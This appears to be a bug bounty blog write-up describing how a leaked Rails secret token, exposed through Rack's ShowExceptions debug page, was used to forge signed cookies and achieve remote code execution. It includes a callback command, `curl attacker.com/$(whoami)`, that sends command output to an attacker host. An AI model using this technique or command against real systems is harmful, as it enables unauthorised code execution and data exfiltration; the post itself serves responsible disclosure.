RCE due to ShowExceptions

Hey guys, First of all a good news, I'm starting to blog my findings again, I have few posts ready just waiting for confirmation from companies to make them public.

Getting Started

So a few days back i started testing a private BB program, I found a straightforward RCE on it. I choose'd to start hunting on the main web app i.e. https://app.redacted.com, While going through i found an endpoint which downloads a CSV report via redacted.redacted.com (In-scope asset). The filename and its content was defined in the request it self,

Something happened

I was fuzzing around parameters, When i passed %0d to file_name the server threw an exception, The exception thrown because Rack's ShowExceptions was on.

It's more than something

As the the Rack's page suggests, "Be careful when you use this on public-facing sites as it could reveal information helpful to attackers", This must not be turned on on production environment. Rails (up to v4.0.2 NOT SURE) had a Secret token in /config/initializers/secret_token.rb. This token is used to verify the integrity of signed cookies (Any cookie set by your rails application is signed using this token), From Rails 4.0.2 this token is kept as environment variable `action_dispact.secret_token`. The exceptions page also leaks or better say includes this too. This token can be used to get RCE ( https://robertheaton.com/2013/07/22/how-to-hack-a-rails-app-using-its-secret-token/ ) You can read about this on the given link to understand and know how this works.

I quickly used the above code to generate a cookie to execute `curl attacker.com/$(whoami)` and got an request to attacker.com/app.

This RCE was applicable for both https://app.redacted.com/ and https://redacted.redacted.com/ because both shared same rails app.

That's all folks :) Share/Retweet is much appreciated. Doubt? DM me at @rootxharsh

Timeline

16 July : Bug found and Reported
16 July : Triaged
18 July : Fixed
20 July : $5000 Rewarded

Page updated

Google Sites

Report abuse